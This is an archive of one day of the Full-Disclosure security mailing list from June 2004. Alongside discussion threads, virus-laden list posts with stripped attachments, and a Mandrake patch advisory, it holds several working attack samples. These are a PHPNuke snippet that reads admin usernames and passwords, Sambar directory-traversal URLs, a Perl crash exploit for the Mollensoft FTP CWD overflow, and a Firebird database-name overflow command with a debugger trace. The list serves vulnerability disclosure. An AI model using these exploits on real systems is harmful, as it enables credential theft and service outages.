From dowlingg at sullcrom.com Tue Jun 1 07:02:11 2004 From: dowlingg at sullcrom.com (Dowling, Gabrielle) Date: Tue, 1 Jun 2004 02:02:11 -0400 Subject: [Full-Disclosure] Cleanining viruses from netware Message-ID: A certain mass maier that infected a netware environment? And you have a buddy to fix it? Please talk about the mass mailer. You think is inplay, G -----Original Message----- From: Gadi Evron To: Full-Disclosure CC: Dowling, Gabrielle Sent: Mon May 31 09:53:39 2004 Subject: Re: [Full-Disclosure] Cleanining viruses from netware Dowling, Gabrielle wrote: > Gadi.... > > What exactly are you encountering? > > If you aren't running an av nlm on the server(s) in question, you should be able to map a drive to the system from even a workstation, and run a scan from there. > > I'm not aware of anything that can actually infect a netware system, just things that can drop latent infectious content when write rights are relatively open. > > What exactly are you dealing with? A certain mass mailer which infected a netware network. I've dealt with most of it, but I am looking for some script similar to what a friend of mine once wrote for active directory, using LDAP and running from a domain admin account. The script scanned the network and remotely removed the infection... Which is what I am looking for, if one such as that already exist and can be shared.. only for netware. Thanks for your answer, Gadi Evron. -- Email: ge at linuxbox.org. Work: gadie at cbs.gov.il. Backup: ge at warp.mx.dk. Phone: +972-50-428610 (Cell). PGP key for attachments: http://vapid.reprehensible.net/~ge/Gadi_Evron.asc ID: 0xD9216A06 FP: 5BB0 D3E2 D3C1 19B7 2104 C0D0 A7B3 1CF7 D921 6A06 GPG key for encrypted email: http://vapid.reprehensible.net/~ge/Gadi_Evron_Emails.asc ID: 0x06C7D450 FP: 3B88 845A DF1F 4062 E5BA 569A A87E 8DB7 06C7 D450 ********************************************************************** This e-mail is sent by a law firm and contains information that may be privileged and confidential. If you are not the intended recipient, please delete the e-mail and notify us immediately. *********************************************************************** -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040601/4ee1b4b3/attachment.html From cm at coretec.at Tue Jun 1 08:24:39 2004 From: cm at coretec.at (Cm) Date: Tue, 01 Jun 2004 08:24:39 +0100 Subject: [Full-Disclosure] Re: Hi Message-ID: An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040601/5f3f3ad2/attachment.html -------------- next part -------------- A non-text attachment was scrubbed... Name: You_are_dismissed.cpl Type: application/octet-stream Size: 21570 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040601/5f3f3ad2/attachment.obj From sam at ipsupport.co.uk Tue Jun 1 08:09:54 2004 From: sam at ipsupport.co.uk (Sam Bashton) Date: Tue, 1 Jun 2004 08:09:54 +0100 Subject: [Full-Disclosure] Possible bug in PHPNuke and other CMS In-Reply-To: <40B9F55E.9050402@libero.it> References: <40B9F55E.9050402@libero.it> Message-ID: <20040601070954.GA23397@ipsupport.co.uk> On Sun, May 30, 2004 at 04:53:18PM +0200, Luca Falavigna wrote: > There is a vulnerability in PHPNuke that permits execution of arbitrary > SQL queries on a database located in the same server of an attacker's > account. This is the procedure: first of all attacker must create a > symlink pointing to victim's db directory in PHPNuke home directory > because of mainfile.php include method. After that he can build a simple > php code executing a query to the PHPNuke database. Here is an example: > > require_once ("/location_of_victim's_PHPNuke/mainfile.php"); > $sql = $db->sql_query("SELECT aid,pwd FROM ".$prefix."_authors"); > while($record = $db->sql_fetchrow($sql)) > ~ echo "Username: $record[aid]\n
\nPassword: $record[pwd]\n

\n"; > unset($sql); > ?> This is an administration issue rather than a security vulnerability. In order to use this attack the attacker requires access to: 1. Another site on the victim's server 2. A sufficiently poorly administered server on which (s)he can: a. Create a symlink or b. Specify an absolute path for includes Those hosting multiple PHP sites ought to be using PHP's open_basedir directive to limit the files that can be opened by PHP. If this isn't being used they are plenty of other easy attacks open to anyone with an account on the same server. -- Sam Bashton Systems Administrator IP Support From sudharsha at sms.lk Tue Jun 1 08:18:30 2004 From: sudharsha at sms.lk (sudharsha) Date: Tue, 1 Jun 2004 13:18:30 +0600 Subject: [Full-Disclosure] watch guard Message-ID: <003c01c447a8$ba7823d0$9f64a8c0@eng> Hi all Does any one know a vulnarability in Watch guard? Rgds Sudharsha From mg_outlaw at hotmail.com Tue Jun 1 09:12:24 2004 From: mg_outlaw at hotmail.com (m g) Date: Tue, 01 Jun 2004 08:12:24 +0000 Subject: [Full-Disclosure] Beware of 'IBM laptop order' email Message-ID: Hi all, Last week on the site of 'The Register' an article was published about spam-mail that used an unknown 'zero-day' vulnerability in IE. They did not release any information about the zero-day issue, so perhaps anyone on the list knows anything about this issue and whether or not this issue is really a zero-day vulnerability or just a old one, The article can be found at the following URL: http://www.theregister.co.uk/2004/05/24/fake_order_viral_scam/ Greetings Mike _________________________________________________________________ Help STOP SPAM with the new MSN 8 and get 2 months FREE* http://join.msn.com/?page=features/junkmail From charlie at peopleandplanet.org Tue Jun 1 10:26:24 2004 From: charlie at peopleandplanet.org (Charlie Harvey ) Date: Tue, 01 Jun 2004 10:26:24 +0100 Subject: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1677 - 23 msgs In-Reply-To: <20040528194410.10576.30329.Mailman@NETSYS.COM> Message-ID: <40BC59D0.22356.163A22@localhost> | Charlie... | | Put down the crack pipe and back away slowly. You are surely not | suggesting that this issue of Cisco's code has anything...at | all...remotely...in common with the people and actions you | listed...seriously... *blush* No, of course not! The chap I replied to was asserting that breaking the law was ALWAYS wrong, whatever the circumstances, or the law. Sorry if people read it wrongly! I thought the snipping made clear the point I was making was simply that breaking laws can /sometimes/ be right. Charlie From oliver at greyhat.de Tue Jun 1 10:52:04 2004 From: oliver at greyhat.de (oliver at greyhat.de) Date: Tue, 1 Jun 2004 11:52:04 +0200 Subject: [Full-Disclosure] =?iso-8859-1?Q?Sambar_Proxy_Multible_Vulnerabilities?= Message-ID: <5452427$108608324940bc50b158cee8.36652122@config10.schlund.de> Sambar Proxy Multible Vulnerabilities ===================================== I found some vulnerabilitites in Sambar Webproxy (www.sambar.com), which allow the sambar admin access to files outside of the application directories. Since Sambar comes with no password for admin as default, it might be a security problem, if administration of Sambar proxy is allowed from any IP (by default it is restricted to 127.0.0.1!). In Addition, i found some XSS. Directory Traversal =================== http://myserver/sysadmin/system/showini.asp?file=\..\..\..\..\..\..\..\boot.ini See: www.oliverkarow.de/research/sambar_trav.GIF Direct File Access ================== http://localhost/sysadmin/system/showlog.asp?log=c:\boot.ini&tail=y Cross Site Scripting ==================== http://localhost/sysadmin/system/show.asp?show= http://localhost/sysadmin/system/showperf.asp?area=search&title= Version ======= I only tested Sambar 6.1 Beta 2 on Windows platform (x86). Other versions/platforms may also be affected. Vendor ====== www.sambar.com Vendor is informed, and is fixing this vulns in the next release. Workaround ========== Set a password for admin account and restrict administration to localhost (default). Credits ======= 15.05.2004 www.oliverkarow.de www.oliverkarow.de/research/sambar.txt From se_cur_ity at hotmail.com Tue Jun 1 11:17:10 2004 From: se_cur_ity at hotmail.com (morning_wood) Date: Tue, 1 Jun 2004 03:17:10 -0700 Subject: [Full-Disclosure] Beware of 'IBM laptop order' email References: Message-ID: http://www.f-secure.com/v-descs/wallon.shtml > Last week on the site of 'The Register' an article was published about > spam-mail that used an unknown 'zero-day' vulnerability in IE. They did not > release any information about the zero-day issue, so perhaps anyone on the > list knows anything about this issue and whether or not this issue is really > a zero-day vulnerability or just a old one, > > The article can be found at the following URL: > http://www.theregister.co.uk/2004/05/24/fake_order_viral_scam/ > From eric at swordsoft.com Tue Jun 1 11:27:59 2004 From: eric at swordsoft.com (Eric Knight) Date: Tue, 1 Jun 2004 04:27:59 -0600 Subject: [Full-Disclosure] Visual Enterprise Security/Fatum Agent Open Beta Announcement Message-ID: <019101c447c3$1d40d740$6600a8c0@datendrao2d5z7> Greetings, This is an open call for beta testers and interested parties to take a look at the Visual Enterprise Security Server and Fatum Agent technology that I (SwordSoft, me.) have been developing. It's a Microsoft Windows based Agent/Server security and management architecture that is meant to be an experimental design for integration of security tools based on the design strategies presented in the "Treatise on Informational Warfare" (As it stands, 75% of the framework has been implemented.) The information about the product(s) can be found at: http://www.swordsoft.com/modules.php?name=VES (Visual Enterprise Security) http://www.swordsoft.com/modules.php?name=Fatum (Fatum Agent) You can download it now without a bunch of registration forms and whatnot immediately from: http://www.swordsoft.com/modules.php?name=Downloads To stem off "I'm doing this for the advertising" complaints, the product may be planned for commercial use, and there are people working gratis to help build SwordSoft, but the VES/Fatum products are going to be free for up to 10 computers even after it goes final. I do want this product to be used by the majority, it's aimed at the small environments and tries and move as far away from the "expensive band-aid" as possible. Aside from that, VES currently isn't "for sale" by SwordSoft and in fact, nothing on the web site is. The program was written in a very small computing environment, so it's a big mystery to us if it can even scale past 10 computers - we're predicting 20, although in theory a PC with a gig of ram could handle 250.. Anyway, the point being its concept technology brought to a level where it needs to get out of the lab. I've written almost 400,000 lines of code into this, made over 1,000 icons, the distribution size is about 20 megabytes for the server, 10 megabytes for the Agent. With some help from some supporters providing distribution bandwidth, we're giving "grassroots" a try to at least figure out what the people in the industry think of this "concept-ware". I did my best to keep the project as professional as possible given its scale, lack of resources, and such. I was following my dream for an "all encompassing" type of integrated security environment that at least makes a genuine attempt to be friendly and easy to use. The reality behind a program like this is that it's a series of growth steps, building framework, building tools to test it, building components, platform tests, etc. My choices for tools at this time were based on framework integration, not industry need, but you'll get the idea what the whole system is capable of if you play around. I've been focusing more on industry demands lately. Anyway, enjoy. I hope you'll find it useful. I'll continue to support the development of the products; I've got no end to the number of improvements I want to make. The Beta keys don't have time expiration. They'll be fully functional for when the product is in "final" release. And otherwise, I look forward to hearing about what people think of this effort. Thank you, Eric Knight Security Researcher, Overworked, Dazed. eric at swordsoft.com From prandal at herefordshire.gov.uk Tue Jun 1 11:49:31 2004 From: prandal at herefordshire.gov.uk (Randal, Phil) Date: Tue, 1 Jun 2004 11:49:31 +0100 Subject: [Full-Disclosure] Beware of 'IBM laptop order' email Message-ID: <801403078973F243A6A74322E134AF500F1C65@mail.herefordshire.gov.uk> Good try, but it doesn't match what we received here. The site linked to in the original email was down by the time I got to investigating, alas. Phil ---- Phil Randal Network Engineer Herefordshire Council Hereford, UK > -----Original Message----- > From: full-disclosure-admin at lists.netsys.com > [mailto:full-disclosure-admin at lists.netsys.com] On Behalf Of > morning_wood > Sent: 01 June 2004 11:17 > To: m g; full-disclosure at lists.netsys.com > Subject: Re: [Full-Disclosure] Beware of 'IBM laptop order' email > > http://www.f-secure.com/v-descs/wallon.shtml > > > > Last week on the site of 'The Register' an article was > published about > > spam-mail that used an unknown 'zero-day' vulnerability in IE. They > > did not release any information about the zero-day issue, > so perhaps > > anyone on the list knows anything about this issue and > whether or not > > this issue is really a zero-day vulnerability or just a old one, > > > > The article can be found at the following URL: > > http://www.theregister.co.uk/2004/05/24/fake_order_viral_scam/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > From cm at coretec.at Tue Jun 1 14:19:03 2004 From: cm at coretec.at (Cm) Date: Tue, 01 Jun 2004 14:19:03 +0100 Subject: [Full-Disclosure] New changes Message-ID: An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040601/8175754a/attachment.html -------------- next part -------------- A non-text attachment was scrubbed... Name: Message.scr Type: application/octet-stream Size: 20397 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040601/8175754a/attachment.obj From ge at egotistical.reprehensible.net Tue Jun 1 15:38:15 2004 From: ge at egotistical.reprehensible.net (Gadi Evron) Date: Tue, 01 Jun 2004 16:38:15 +0200 Subject: [Full-Disclosure] Cleanining viruses from netware In-Reply-To: References: Message-ID: <40BC94D7.7040306@egotistical.reprehensible.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dowling, Gabrielle wrote: | A certain mass maier that infected a netware environment? And you have a buddy to fix it? | | Please talk about the mass mailer. You think is inplay, | | G My inquiry was about netware, not a particular virus. Thank you for all your help, I have received an answer privately. Have a good day! Gadi Evron. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.3 (MingW32) iD8DBQFAvJTWqH6NtwbH1FARAiYFAKCJgF7wMxB0Yxofz2VpKVO1Yz2EMgCfWXqT 0ADuE76uLwPWzRFGYnYy8z4= =YUQS -----END PGP SIGNATURE----- From cm at coretec.at Tue Jun 1 16:18:48 2004 From: cm at coretec.at (Cm) Date: Tue, 01 Jun 2004 16:18:48 +0100 Subject: [Full-Disclosure] Hidden message Message-ID: An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040601/9518b6d5/attachment.html -------------- next part -------------- A non-text attachment was scrubbed... Name: You_will_answer_to_me.scr Type: application/octet-stream Size: 20995 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040601/9518b6d5/attachment.obj From skip at duckwall.net Tue Jun 1 15:22:43 2004 From: skip at duckwall.net (Skip Duckwall) Date: Tue, 1 Jun 2004 09:22:43 -0500 (CDT) Subject: [Full-Disclosure] Beware of 'IBM laptop order' email In-Reply-To: References: Message-ID: Since it's a phishing email, I'm sure the exploit they're referring to is the one that exploits the compiled help files (.chm files), even though it's not exactly new... Although the way the hostile chm files are executed without user intervention has been patched (the MS-ITS vulnerability in MS04-013 I believe...) This type of phishing scam isn't really all that new and you can find all sorts of writeups using google. A particularty decent site that has lots of phishing writeups (aside from the one I'm linking to) http://spamwatch.codefish.net.au/modules.php?op=modload&name=News&file=article&sid=98 just my guess.... Alva Lease 'Skip' Duckwall CISSP,RHCE,SCSA skip at duckwall dot net On Tue, 1 Jun 2004, m g wrote: > Hi all, > > Last week on the site of 'The Register' an article was published about > spam-mail that used an unknown 'zero-day' vulnerability in IE. They did not > release any information about the zero-day issue, so perhaps anyone on the > list knows anything about this issue and whether or not this issue is really > a zero-day vulnerability or just a old one, > > The article can be found at the following URL: > http://www.theregister.co.uk/2004/05/24/fake_order_viral_scam/ > > Greetings Mike > > _________________________________________________________________ > Help STOP SPAM with the new MSN 8 and get 2 months FREE* > http://join.msn.com/?page=features/junkmail > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > From keydet89 at yahoo.com Tue Jun 1 15:22:49 2004 From: keydet89 at yahoo.com (Harlan Carvey) Date: Tue, 1 Jun 2004 07:22:49 -0700 (PDT) Subject: [Full-Disclosure] Cleanining viruses from netware In-Reply-To: <40BC94D7.7040306@egotistical.reprehensible.net> Message-ID: <20040601142249.30999.qmail@web51503.mail.yahoo.com> Gadi, For the sake of the list, would you be willing to share the answer you received? --- Gadi Evron wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Dowling, Gabrielle wrote: > > | A certain mass maier that infected a netware > environment? And you > have a buddy to fix it? > | > | Please talk about the mass mailer. You think is > inplay, > | > | G > > My inquiry was about netware, not a particular > virus. > > Thank you for all your help, I have received an > answer privately. > > Have a good day! > > Gadi Evron. > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.2.3 (MingW32) > > iD8DBQFAvJTWqH6NtwbH1FARAiYFAKCJgF7wMxB0Yxofz2VpKVO1Yz2EMgCfWXqT > 0ADuE76uLwPWzRFGYnYy8z4= > =YUQS > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html From ge at egotistical.reprehensible.net Tue Jun 1 16:26:33 2004 From: ge at egotistical.reprehensible.net (Gadi Evron) Date: Tue, 01 Jun 2004 17:26:33 +0200 Subject: [Full-Disclosure] Cleanining viruses from netware In-Reply-To: <20040601142249.30999.qmail@web51503.mail.yahoo.com> References: <20040601142249.30999.qmail@web51503.mail.yahoo.com> Message-ID: <40BCA029.4050403@egotistical.reprehensible.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Harlan Carvey wrote: | Gadi, | | For the sake of the list, would you be willing to | share the answer you received? I will ask the person who replied. Gadi Evron. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.3 (MingW32) iD8DBQFAvKAmqH6NtwbH1FARAtPXAJ9jXsuC8f+99IhBaX/kyof6+pvGEgCfefAn ulHaMkWYk0PpF+f9NOgn+i8= =hfIz -----END PGP SIGNATURE----- From bwiedman at iconsinc.com Tue Jun 1 17:05:23 2004 From: bwiedman at iconsinc.com (Blake Wiedman) Date: Tue, 1 Jun 2004 12:05:23 -0400 Subject: [Full-Disclosure] Running Both CISCO VPN and Symantec VPN In-Reply-To: Message-ID: <000301c447f2$3f07ccb0$f301010a@corp.fidelityfederal.com> I have a client that is running a Symantec 5420 device. Unfortunately we have a few contractors that use the Cisco VPN client. The Cisco VPN client and the Symantec VPN client will not coexist. Has any one had a similar problem? And how did you solve it? -----Original Message----- From: full-disclosure-admin at lists.netsys.com [mailto:full-disclosure-admin at lists.netsys.com] On Behalf Of Skip Duckwall Sent: Tuesday, June 01, 2004 10:23 AM To: full-disclosure at lists.netsys.com Subject: Re: [Full-Disclosure] Beware of 'IBM laptop order' email Since it's a phishing email, I'm sure the exploit they're referring to is the one that exploits the compiled help files (.chm files), even though it's not exactly new... Although the way the hostile chm files are executed without user intervention has been patched (the MS-ITS vulnerability in MS04-013 I believe...) This type of phishing scam isn't really all that new and you can find all sorts of writeups using google. A particularty decent site that has lots of phishing writeups (aside from the one I'm linking to) http://spamwatch.codefish.net.au/modules.php?op=modload&name=News&file=a rticle&sid=98 just my guess.... Alva Lease 'Skip' Duckwall CISSP,RHCE,SCSA skip at duckwall dot net On Tue, 1 Jun 2004, m g wrote: > Hi all, > > Last week on the site of 'The Register' an article was published about > spam-mail that used an unknown 'zero-day' vulnerability in IE. They did not > release any information about the zero-day issue, so perhaps anyone on the > list knows anything about this issue and whether or not this issue is really > a zero-day vulnerability or just a old one, > > The article can be found at the following URL: > http://www.theregister.co.uk/2004/05/24/fake_order_viral_scam/ > > Greetings Mike > > _________________________________________________________________ > Help STOP SPAM with the new MSN 8 and get 2 months FREE* > http://join.msn.com/?page=features/junkmail > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html From api at epost.de Tue Jun 1 17:26:26 2004 From: api at epost.de (Axel Pettinger) Date: Tue, 01 Jun 2004 18:26:26 +0200 Subject: [Full-Disclosure] Beware of 'IBM laptop order' email References: Message-ID: <40BCAE32.DBD0D6E2@epost.de> Skip Duckwall wrote: > > Since it's a phishing email, I'm sure the exploit they're referring to > is the one that exploits the compiled help files (.chm files), even > though it's not exactly new... Although the way the hostile chm files > are executed without user intervention has been patched (the MS-ITS > vulnerability in MS04-013 I believe...) > > This type of phishing scam isn't really all that new and you can find > all sorts of writeups using google. > > just my guess.... Good guess ... http://groups.google.com/groups?threadm=1085148506.86377.0%40despina.uk.clara.net Regards, Axel Pettinger From aviram at beyondsecurity.com Tue Jun 1 18:12:55 2004 From: aviram at beyondsecurity.com (Aviram Jenik) Date: Tue, 1 Jun 2004 20:12:55 +0300 Subject: [Full-Disclosure] Mollensoft Lightweight FTP Server CWD Buffer Overflow Message-ID: <200406012012.55080.aviram@beyondsecurity.com> Mollensoft Lightweight FTP Server CWD Buffer Overflow ------------------------------------------------------------------------ Article reference: http://www.securiteam.com/windowsntfocus/5RP0L15CUM.html SUMMARY STORM has discovered a security vulnerability in Mollensoft Lightweight FTP Server. Mollensoft Lightweight FTP Server's support for the CWD command incorrectly verifies that the buffer the CWD command doesn't overflow any of its internal buffers. This insufficient verification allows an authenticated (anonymous or otherwise) user to cause the FTP server to crash while trying to read an arbitrary memory location by issuing a malformed CWD command. DETAILS Vulnerable Systems: * Mollensoft Lightweight FTP Server version 3.6 Vendor Response: BigAl (author) responded with the following: I wrote this particular app with Visual Basic and used an FTP ActiveX COM component and I am waiting for the component creator to get back to me regarding the fix. Unfortunately I cannot snip off any of the commands, as access to the command length is not available from the VB component using straight VB Code. I am working on moving to .Net so hopefully I can have a new FTP server out by fall time frame which is truly multi-threaded and totally coded by me. Exploit: #!/usr/bin/perl # # Mollensoft FTP Server CMD Buffer Overflow # # Orkut users? Come join the SecuriTeam community # http://www.orkut.com/Community.aspx?cmm=44441 use strict; use IO::Socket::INET; usage() unless (@ARGV == 2); my $host = shift(@ARGV); my $port = shift(@ARGV); # create the socket my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); $socket or die "Cannot connect to host!\n"; $socket->autoflush(1); # receive greeting my $repcode = "220 "; my $response = recv_reply($socket, $repcode); print $response; # send USER command #my $username = "%00" x 2041; my $username = "anonymous"; print "USER $username\r\n"; print $socket "USER $username\r\n"; select(undef, undef, undef, 0.002); # sleep of 2 milliseconds # send PASS command my $password = "a\@b.com"; print "PASS $password\r\n"; print $socket "PASS $password\r\n"; my $cmd = "CWD "; $cmd .= "A" x 224; # Value can range from 224 to 1018 $cmd .= "\r\n"; print "length: ".length($cmd)."\n"; print $socket $cmd; $repcode = ""; recv_reply($socket, $repcode); close($socket); exit(0); sub usage { # print usage information print "\nUsage: Mollensoft_FTP_Server_crash.pl \n - The host to connect to - The TCP port which WarFTP is listening on\n\n"; exit(1); } sub recv_reply { # retrieve any reply my $socket = shift; my $repcode = shift; $socket or die "Can't receive on socket\n"; my $res=""; while(<$socket>) { $res .= $_; if (/$repcode/) { last; } } return $res; } ADDITIONAL INFORMATION SecurITeam would like to thank STORM for finding this vulnerability. Regards, Aviram Jenik Beyond Security Ltd. http://www.BeyondSecurity.com http://www.SecuriTeam.com The First Integrated Network and Web Application Vulnerability Scanner: http://www.beyondsecurity.com/webscan-wp.pdf ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. From ge at linuxbox.org Tue Jun 1 17:46:55 2004 From: ge at linuxbox.org (Gadi Evron) Date: Tue, 01 Jun 2004 18:46:55 +0200 Subject: [Full-Disclosure] Cleanining viruses from netware In-Reply-To: <20040601142249.30999.qmail@web51503.mail.yahoo.com> References: <20040601142249.30999.qmail@web51503.mail.yahoo.com> Message-ID: <40BCB2FF.8040600@linuxbox.org> Harlan Carvey wrote: > Gadi, > > For the sake of the list, would you be willing to > share the answer you received? Begin quote>>> ST wrote: --------- It relatively easy if the virus is detectable remotely i.e. it has a component listening on a port. A simple nmap scan followed by a remote connect and run of the disinfection tool will work. I prefer this approach over using the directory service as it catches all active machines, irrespective of whether they are in the directory or not. Another approach is to use a login script that runs the disinfection util automatically, subsequent logins do not run the script. I used the absence of a file in a directory to indicate that the util had to be run, run the script and then *IF* successful, create the flag file. A combo of these methods will rapidly and effectivly catch most of the infected machines and remove them. ----- Gadi. From aviram at beyondsecurity.com Tue Jun 1 18:40:14 2004 From: aviram at beyondsecurity.com (Aviram Jenik) Date: Tue, 1 Jun 2004 20:40:14 +0300 Subject: [Full-Disclosure] Firebird Database Remote Database Name Overflow Message-ID: <200406012040.14839.aviram@beyondsecurity.com> Firebird Database Remote Database Name Overflow ------------------------------------------------------------------------ Article reference: http://www.securiteam.com/unixfocus/5AP0P0UCUO.html SUMMARY Firebird is "a relational database offering many ANSI SQL-92 features that runs on Linux, Windows, and a variety of Unix platforms. Firebird offers excellent concurrency, high performance, and powerful language support for stored procedures and triggers. It has been used in production systems, under a variety of names since 1981". A vulnerability in Firebird Database's way of handling database names, allows an unauthenticated user to cause the server to crash, and overwrite critical section of the stack used by the database. DETAILS Vulnerable Systems: * Firebird Database version 1.0 (1.0.2-2.1) - Debian unstable Immune Systems: * Firebird Database version 1.5.0 (others are presumed to be immuned as well) By issuing: gsec -database 192.168.1.52:`perl -e'print ("A"x300)'` -user whenever -password whatever On a remote server, you can see that: gdb /usr/lib/firebird/bin/ibserver GNU gdb 6.1-debian Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-linux"...(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1". (gdb) r Starting program: /usr/lib/firebird/bin/ibserver (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...[Thread debugging using libthread_db enabled] [New Thread 1075462272 (LWP 31389)] (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...[New Thread 1092549552 (LWP 31392)] [New Thread 1100938160 (LWP 31393)] [Thread 1100938160 (LWP 31393) exited] [Thread 1092549552 (LWP 31392) exited] [New Thread 1092549552 (LWP 31396)] Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 1092549552 (LWP 31396)] 0x08132223 in ERR_post () (gdb) bt #0 0x08132223 in ERR_post () #1 0x080942ac in THD_wlck_unlock () #2 0x41414141 in ?? () #3 0x41414141 in ?? () #4 0x41414141 in ?? () #5 0x41414141 in ?? () #6 0x41414141 in ?? () #7 0x41414141 in ?? () #8 0x00414141 in ?? () #9 0x0000012c in ?? () .. Solution: Debian is currently not maintaining this version of the product, so it is recommended that you use a source code based installation. ADDITIONAL INFORMATION The information has been provided by Noam Rathaus. Regards, Aviram Jenik Beyond Security Ltd. http://www.BeyondSecurity.com http://www.SecuriTeam.com The First Integrated Network and Web Application Vulnerability Scanner: http://www.beyondsecurity.com/webscan-wp.pdf ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. From lupe at lupe-christoph.de Tue Jun 1 22:13:32 2004 From: lupe at lupe-christoph.de (Lupe Christoph) Date: Tue, 1 Jun 2004 23:13:32 +0200 Subject: [Full-Disclosure] Re: RS-2004-1: SquirrelMail "Content-Type" XSS vulnerability In-Reply-To: References: Message-ID: <20040601211332.GB1538@lupe-christoph.de> On Sunday, 2004-05-30 at 03:15:44 +0200, Roman Medina wrote: > I also noticed that latest Debian stable distro ships a very old > version of SquirrelMail, which is vulnerable to several old XSS bugs > (in addition to the new one). The latest Stable is itself quite old. Debian does not release very often. But security bugs are fixed when they become known. I have not found any bug report concerning XSS in the Debian bugs database. Please be so kind and file bugs if you are running Debian. If not, please mail the Debian Security Team as described in http://www.de.debian.org/security/faq#contact Thank you, Lupe Christoph -- | lupe at lupe-christoph.de | http://www.lupe-christoph.de/ | | "... putting a mail server on the Internet without filtering is like | | covering yourself with barbecue sauce and breaking into the Charity | | Home for Badgers with Rabies. Michael Lucas | From security at linux-mandrake.com Tue Jun 1 22:57:52 2004 From: security at linux-mandrake.com (Mandrake Linux Security Team) Date: 1 Jun 2004 21:57:52 -0000 Subject: [Full-Disclosure] MDKSA-2004:053 - Updated xpcd package fix vulnerabilities Message-ID: <20040601215752.17503.qmail@updates.mandrakesoft.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandrakelinux Security Update Advisory _______________________________________________________________________ Package name: xpcd Advisory ID: MDKSA-2004:053 Date: June 1st, 2004 Affected versions: 10.0, 9.2 ______________________________________________________________________ Problem Description: A vulnerability in xpcd-svga, part of xpcd, was discovered by Jaguar. xpcd-svga uses svgalib to display graphics on the console and it would copy user-supplied data of an arbitrary length into a fixed-size buffer in the pcd_open function. As well, Steve Kemp previously discovered a buffer overflow in xpcd-svga that could be triggered by a long HOME environment variable, which could be exploited by a local attacker to obtain root privileges. The updated packages resolve these vulnerabilities. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0649 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0402 ______________________________________________________________________ Updated Packages: Mandrakelinux 10.0: 95c59861d1efef825ab730cba2691365 10.0/RPMS/xpcd-2.08-20.1.100mdk.i586.rpm 3114811e46e3a4b82e053894f153643d 10.0/RPMS/xpcd-gimp-2.08-20.1.100mdk.i586.rpm b3df76a539187146894f18d67a2967fd 10.0/SRPMS/xpcd-2.08-20.1.100mdk.src.rpm Mandrakelinux 10.0/AMD64: 50261e00a816e5621ce37d0f6320a941 amd64/10.0/RPMS/xpcd-2.08-20.1.100mdk.amd64.rpm 4362a1d3211af0c386aef08abfc74cc6 amd64/10.0/RPMS/xpcd-gimp-2.08-20.1.100mdk.amd64.rpm b3df76a539187146894f18d67a2967fd amd64/10.0/SRPMS/xpcd-2.08-20.1.100mdk.src.rpm Mandrakelinux 9.2: 907efca9e8de1fc9489755c919c51b8b 9.2/RPMS/xpcd-2.08-20.1.92mdk.i586.rpm 41078887e2d6bf60d376540653e997f7 9.2/RPMS/xpcd-gimp-2.08-20.1.92mdk.i586.rpm 9e2a2741fb7130324737a9262dbe8afb 9.2/SRPMS/xpcd-2.08-20.1.92mdk.src.rpm Mandrakelinux 9.2/AMD64: 4f434cc67c282744664a14e285b24e9e amd64/9.2/RPMS/xpcd-2.08-20.1.92mdk.amd64.rpm 7b6d9c0dfe83763823cc007f0956b173 amd64/9.2/RPMS/xpcd-gimp-2.08-20.1.92mdk.amd64.rpm 9e2a2741fb7130324737a9262dbe8afb amd64/9.2/SRPMS/xpcd-2.08-20.1.92mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrakeUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandrakesoft for security. You can obtain the GPG public key of the Mandrakelinux Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandrakelinux at: http://www.mandrakesoft.com/security/advisories If you want to report vulnerabilities, please contact security_linux-mandrake.com Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team -----BEGIN PGP SIGNATURE----- 